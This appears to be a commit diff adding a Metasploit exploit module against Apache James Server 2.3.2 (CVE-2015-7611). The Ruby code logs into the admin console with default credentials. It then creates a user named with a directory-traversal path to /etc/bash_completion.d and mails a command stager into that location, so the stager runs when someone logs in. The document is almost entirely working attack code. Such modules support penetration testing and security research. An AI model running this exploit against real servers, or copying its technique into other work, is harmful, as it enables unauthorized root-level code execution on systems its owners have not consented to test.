Add Apache James 2.3.2 Insecure User Creation Command Injection exploit module.

modules/exploits/linux/smtp/apache_james_exec.rb

@@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Apache James Server 2.3.2 Insecure User Creation Command Injection",
+      'Description'    => %q{
+        To use this module, start a listener using the given payload, host, and port before running the exploit. After running the exploit, the payload will be executed when a user logs into the system. This module exploits a vulnerability that exists due to a lack of input validation when creating a user. Messages for a given user are stored in a directory partially defined by the username. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. For this exploit, bash completion must be enabled to gain code execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'Matthew Aberegg', 'Michael Burkey' ],
+      'References'     =>
+        [
+          [ 'CVE', '2015-7611'],
+          [ 'EDB', '35513'],
+          [ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf']
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+      [
+        [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
+        [ 'Linux x64',       { 'Arch' => ARCH_X64 } ]
+      ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Oct 1 2015",
+      'DefaultTarget'  => 0,
+      'CmdStagerFlavor'=> [ 'printf' ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'true'
+        }
+      ))
+      register_options(
+        [
+          OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
+          OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
+          OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ])
+        ])
+      deregister_options('SRVHOST', 'SRVPORT')
+  end
+
+  def check
+    connect
+    banner = sock.get
+    if banner.include? "(JAMES SMTP Server 2.3.2)"
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Unknown
+    end
+    disconnect
+  end
+
+  def execute_command(cmd, opts = {})
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+
+    connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
+
+    sock.get
+
+    sock.puts(username + "\n")
+    sock.get
+
+    sock.puts(password + "\n")
+    sock.get
+
+    sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
+    sock.get
+
+    sock.puts("quit\n")
+    disconnect
+
+    connect
+
+    sock.puts("ehlo admin@apache.com\r\n")
+    sock.get
+
+    sock.puts("mail from: <'@apache.com>\r\n")
+    sock.get
+
+    sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
+    sock.get
+
+    sock.puts("data\r\n")
+    sock.get
+
+    sock.puts("From: admin@apache.com\r\n")
+    sock.puts("\r\n")
+    sock.puts("'\n")
+    sock.puts("#{cmd}\n")
+    sock.puts("\r\n.\r\n")
+    sock.get
+
+    sock.puts("quit\r\n")
+    sock.get
+
+    disconnect
+  end
+
+  def exploit
+    execute_cmdstager
+  end
+
+end